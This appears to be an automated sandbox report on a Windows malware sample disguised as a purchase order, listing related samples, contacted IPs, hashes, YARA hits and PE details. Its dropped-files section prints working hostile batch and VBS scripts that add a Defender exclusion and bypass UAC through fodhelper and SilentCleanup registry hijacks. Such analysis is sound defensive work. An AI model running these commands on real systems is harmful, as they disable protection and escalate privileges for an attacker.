                                                                                          Jvdivmn_Signed_.exeGet hashmaliciousBrowse
                                                                                            Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                                                                                              Factura.exeGet hashmaliciousBrowse
                                                                                                4XqxRwCQi7.exeGet hashmaliciousBrowse
                                                                                                  RuntimeB.exeGet hashmaliciousBrowse
                                                                                                    Runtime Broker.exeGet hashmaliciousBrowse
                                                                                                      RYnBavdgiB.exeGet hashmaliciousBrowse
                                                                                                        Ever Rose Order Specification REF-987NDH.exeGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          discord.com11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          caw.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.138.232
                                                                                                          lxpo.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          SpecificationX20202611.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.138.232
                                                                                                          New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          Komfkim_Signed_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.232
                                                                                                          oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          cdn.discordapp.comPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          Vessel details.docGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          INV SF2910202.docGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          Komfkim_Signed_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          ce5f3254611a8c095a3d821d44539877PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          caw.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          6znqz0d1.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          2zv940v7.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Izezma64.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          fuxenm32.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          api-cdef.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.jsGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.jsGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          FxzOwcXb7x.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Izipubob.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          nivude1.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Accesshover.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\Public\Xzqvp.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86
                                                                                                          Entropy (8bit):4.565344987058984
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:pFEjDaHF598TULLvBRVPjDaHF598TULLvBRy:pFEPaHhdLbnVPPaHhdLbny
                                                                                                          MD5:7FD082AAA613DEE2AC4DFE43AA568452
                                                                                                          SHA1:24C764D19008C8E6E0EA2B92D26D5A7EEDA39A3B
                                                                                                          SHA-256:45CF90DB799654A9E3BA1CB487E2169FFBE28E73D0EDDBF7453C25125FEC979C
                                                                                                          SHA-512:566986F5B9FD898101491C2649F242A5DEEC6A3D4E2F4F5A2761DBAFABF10733F7933C78CBBAFF5FEDCC302F5CF7E91BEA2CB3E7B6FEE05F4CA32C013B2B53B0
                                                                                                          Malicious:false
                                                                                                          Preview: cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..
                                                                                                          C:\Users\Public\Xzqvpcvb.vbs
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):530
                                                                                                          Entropy (8bit):4.98731455850251
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:fDNZcAqSPK+uSLKMPncwWkqcgpDNZcAqSPK+uSLKMPncwWkqcg5:fDN2AqsOM/NWkqcgpDN2AqsOM/NWkqck
                                                                                                          MD5:6FFC5D3B2EEA8DE8E112C11EF172C202
                                                                                                          SHA1:08928DAAD7F51C719F21753FA77ECD2E22438A1F
                                                                                                          SHA-256:1DA88FA21B51E47D5EBAB7004DB14CD825646545A22BB8E4B9137910060FFDA2
                                                                                                          SHA-512:3D7E63D15446E248188889951B3AA7BAC1CB45FCDB2FFA4533FDBD3F820607F2B190E6AA0C321D71D71BC1DEE8A661E5C74BECD356AFD6B2EE5B4ACF772A3C5A
                                                                                                          Malicious:false
                                                                                                          Preview: dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..
                                                                                                          C:\Users\Public\Xzqvphcc.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):590
                                                                                                          Entropy (8bit):4.692054461517121
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:s8MeMQ7huqfDutOoN98MeMQ7huqfDutOoa:We/9uqfDutOqDe/9uqfDutOh
                                                                                                          MD5:A94C89BF90B24D3CE502FFA49B083A0E
                                                                                                          SHA1:CDD29B18E578429246C7482EA23EBBF53DBBF499
                                                                                                          SHA-256:48B9A3DCD7D1670772C2BD085CC0588D9A5B8529F602F5B6055DE9327C52CCD9
                                                                                                          SHA-512:D0E1BF66A95E2DA8C68C409D90E7134CE224B01D5894069BE24DD27BA7FC5F4A4D5BF3E254F5D702EE919D4AE86205409A42D6151BE50A88E785E0C4E05A906A
                                                                                                          Malicious:false
                                                                                                          Preview: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..
                                                                                                          C:\Users\Public\Xzqvptso.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):673
                                                                                                          Entropy (8bit):5.055242933466055
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:rgaX0WMYaXe1uOeV9gaXsbbyid1e4ziLpVmWEM3/jEb6dTD1Mn:rnX0dvXrOeV9nXsCIE4eTMTsSn
                                                                                                          MD5:F30EA4775996A873C0AD2C14679C9D97
                                                                                                          SHA1:05955BE0B5BE66FC7E1F582CD572EECC6E238C6F
                                                                                                          SHA-256:31F4287BD7007AF20FCE126ABD7D4AEA174C51DB2DE09D7F8A41AFED510689B5
                                                                                                          SHA-512:28BA7D44BAEF419B6831B47F0705B2E3966FB54808B050A2F802E5A857A0E6AA3CB34A627080758E1E40722188BD6D78AAD65A66CCE14FEB2693580D344BE924
                                                                                                          Malicious:false
                                                                                                          Preview: reg delete hkcu\Environment /v windir /f ..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I..reg delete hkcu\Environment /v windir /f REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f.REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f.fodhelper.exe.cmd /c start /min C:\Users\Public\x.bat
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1311424
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          MD5:310A7CA550B9997D0E0BCAF645530303
                                                                                                          SHA1:5617D1E233381EA3FD6AB796FCC6A2DE66137C51
                                                                                                          SHA-256:0EE90C988386390753A1954692A658E393D761887ECFBFD100105C365A3EBC34
                                                                                                          SHA-512:C6D438F7CCAEC0DCB5F64CBF50B05AF909366EA30C15C15C38CD1ABBAF02E7228A26C36781E140841DAA79C138BD0C63DEF9AB769EE40C2525A6A950B1107175
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@...........................0...".......................T......8............................p......................................................CODE....|........................... ..`DATA....T).......*..................@...BSS.....M................................idata..."...0...$..................@....tls.........`...........................rdata.......p......................@..P.reloc..8...........................@..P.rsrc...............................@..P.............0......................@..P........................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\uvvE.url
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe>), ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):169
                                                                                                          Entropy (8bit):5.15339576531091
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:HRAbABGQYmHmEX+Ro6p4EkD5oef5yaKYTvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmcKaJkDlR9NvQJ5OtZF9k/qI72v
                                                                                                          MD5:B0A940253E10E504ECD095FED46C0E83
                                                                                                          SHA1:683B39147B3ACE175BE29D6F8FBFB5B8F85D65B0
                                                                                                          SHA-256:4071F88611A9C05F83FF964309BB8F5DCF56E07DFB40388D732D47EF842A91DE
                                                                                                          SHA-512:4FCABD03392A263476576525A479B9861B20D396C73108B8C4BA001FC2DE7C0775ACD845A6D6D602D6D8EB348EFB87FEE765230745C6D76F73993019AE65B166
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..
                                                                                                          C:\Windows\assembly\Desktop.ini
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227
                                                                                                          Entropy (8bit):5.2735028737400205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a1eZBXVNYTF0NwoScUbtSgyAXIWv7v5PMKq:UeZBFNYTswUq1r5zq
                                                                                                          MD5:F7F759A5CD40BC52172E83486B6DE404
                                                                                                          SHA1:D74930F354A56CFD03DC91AA96D8AE9657B1EE54
                                                                                                          SHA-256:A709C2551B8818D7849D31A65446DC2F8C4CCA2DCBBC5385604286F49CFDAF1C
                                                                                                          SHA-512:A50B7826BFE72506019E4B1148A214C71C6F4743C09E809EF15CD0E0223F3078B683D203200910B07B5E1E34B94F0FE516AC53527311E2943654BFCEADE53298
                                                                                                          Malicious:false
                                                                                                          Preview: ; ==++==..; ..; Copyright (c) Microsoft Corporation. All rights reserved...; ..; ==--==..[.ShellClassInfo]..CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}..ConfirmFileOp=1..InfoTip=Contains application stability information...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                          • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                          File name:New Order PO20011046.exe
                                                                                                          File size:1311424
                                                                                                          MD5:310a7ca550b9997d0e0bcaf645530303
                                                                                                          SHA1:5617d1e233381ea3fd6ab796fcc6a2de66137c51
                                                                                                          SHA256:0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
                                                                                                          SHA512:c6d438f7ccaec0dcb5f64cbf50b05af909366ea30c15c15c38cd1abbaf02e7228a26c36781e140841daa79c138bd0c63def9ab769ee40c2525a6a950b1107175
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a8949ea686da6a

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x47d118
                                                                                                          Entrypoint Section:CODE
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:c7f986b767e22dea5696886cb4d7da70

                                                                                                          Authenticode Signature

                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before, Not After
                                                                                                          • 8/18/2016 10:17:17 PM 11/2/2017 9:17:17 PM
                                                                                                          Subject Chain
                                                                                                          • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:3B66EDDAB891B79FEDB150AC2C59DB3A
                                                                                                          Thumbprint SHA-1:98ED99A67886D020C564923B7DF25E9AC019DF26
                                                                                                          Thumbprint SHA-256:57DD481BF26C0A55C3E867B2D6C6978BEAF5CE3509325CA2607D853F9349A9FF
                                                                                                          Serial:330000014096A9EE7056FECC07000100000140

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          add esp, FFFFFFF0h
                                                                                                          mov eax, 0047CE60h
                                                                                                          call 00007F897485DF95h
                                                                                                          lea edx, dword ptr [ebx+eax]
                                                                                                          push 00000019h
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          call 00007F89748B30E8h
                                                                                                          mov ecx, dword ptr [00480750h]
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov edx, dword ptr [0047C9ECh]
                                                                                                          call 00007F89748B30E8h
                                                                                                          mov eax, dword ptr [00480750h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          xor edx, edx
                                                                                                          call 00007F89748AC65Ah
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov byte ptr [eax+5Bh], 00000000h
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          call 00007F89748B3143h
                                                                                                          call 00007F897485BA86h
                                                                                                          nop
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
